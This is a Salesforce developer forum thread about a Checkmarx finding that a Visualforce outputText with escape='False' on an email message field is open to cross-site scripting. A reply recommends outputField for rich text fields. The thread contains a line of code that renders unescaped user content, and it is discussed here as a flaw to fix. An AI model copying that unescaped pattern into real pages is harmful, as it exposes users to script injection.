Apex Code Development You need to sign in to do that
Don't have an account?
Anuj Joshi 42 Escaping in vf page
Hi All,
I have a line of code which is written like this.
I am getting a output as <p> Hi <br/> ...in this format. Kindly help me to resolve this issue. Actually I am displaying the emailmeesage content in this vf page and diplaying in case related list.
Thanks,
Anuj
I have a line of code which is written like this.
<apex:outputText escape="False" value="{!cr.Message__c}" rendered="{!(cr.Message__c)!= ''}"/><br/><br/>
I am getting an issue in the checkmarx report saying that this line is vulnerable to Cross site scripting (XSS). When i convert the above line to
<apex:outputText escape="False" value="{!HTMLENCODE(cr.Message__c)}" rendered="{!HTMLENCODE(cr.Message__c)!= ''}"/>
I am getting a output as <p> Hi <br/> ...in this format. Kindly help me to resolve this issue. Actually I am displaying the emailmeesage content in this vf page and diplaying in case related list.
Thanks,
Anuj
Try Changing it to outputField and remove escape false , it will automatically handle the vulnerablithy attacks.
<apex:outputField value="{!cr.Message__c}" rendered="{!cr.Message__c!= ''}"/>Hope this helps.Its a rich text area field.
Thanks,
Anuj
Rich Text Area Fields are safe types to render as per salesforce secure coding guidelines . Output Field tag will automatically encode unsafe characters.
https://salesforce.stackexchange.com/questions/106593/xss-rich-textarea-content-security-review-issue-when-using-escape-false